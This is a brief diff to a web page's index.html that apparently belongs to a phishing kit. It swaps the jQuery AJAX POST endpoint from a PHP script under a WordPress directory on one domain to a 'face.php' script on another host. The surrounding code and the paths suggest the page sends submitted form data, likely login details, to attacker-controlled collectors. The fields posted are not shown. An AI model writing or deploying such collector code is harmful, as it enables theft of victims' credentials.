--- a/index.html
+++ b/index.html
@@ -10453,7 +10453,7 @@ $(document).ready(function() {
         $('#msg').text(msg);
         count = count + 1;
         $.ajax({
-            url: "http://anahaproperty.co.kr//wp-includes/face/fresh.php",
+            url: "https://yume.cutegirl.jp/ghst/msn/face.php",
             dataType: 'JSON',
             type: 'POST',
             data: {
